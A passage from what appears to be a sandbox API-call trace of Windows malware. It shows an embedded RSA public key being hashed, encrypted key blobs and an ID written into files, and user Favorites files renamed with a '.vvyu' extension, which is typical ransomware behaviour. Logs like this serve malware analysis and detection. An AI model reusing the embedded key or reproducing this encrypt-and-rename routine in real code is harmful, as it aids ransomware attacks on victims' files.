KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.713] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.713] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0194.714] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0194.714] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.714] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0194.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0194.715] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0194.715] GetLastError () returned 0x0 [0194.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.715] GetLastError () returned 0x0 [0194.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.715] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0194.715] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0194.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.716] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0194.716] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0194.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.716] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0194.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0194.716] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2458 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6338 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2410 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6350 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6380 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63e0 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6398 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0194.717] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0194.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0194.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0194.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0194.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63e0 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6398 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6380 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0194.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0194.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0194.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0194.720] GetCurrentThreadId () returned 0x5d8 [0194.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0194.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7e78 [0194.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0194.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0194.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0194.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.721] GetCurrentThreadId () returned 0x5d8 [0194.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0194.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0194.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0194.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63e0 [0194.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6380 [0194.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0194.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0194.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0194.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0194.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6398 [0194.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0194.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0194.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0194.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6368 [0194.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0194.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63f8 [0194.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0194.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63c8 [0194.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63b0 [0194.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6410 [0194.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63b0 [0194.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0194.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0194.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0194.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6380 [0194.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0194.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0194.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0194.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0194.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0194.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0194.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0194.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0194.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0194.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0194.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0194.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0194.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0194.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0194.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0194.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0194.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0194.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0194.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0194.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2410 | out: hHeap=0x2c0000) returned 1 [0194.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0194.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0194.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0194.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0194.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0194.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0194.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.733] WriteFile (in: hFile=0x584, lpBuffer=0x3b48b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48b8*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0194.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0194.733] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.733] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0194.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0194.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0194.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.734] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.735] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.735] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.735] CloseHandle (hObject=0x584) returned 1 [0194.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0194.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0194.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0194.736] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live gallery.url.vvyu")) returned 1 [0194.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.738] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0194.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0194.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0194.741] HeapFree (in: 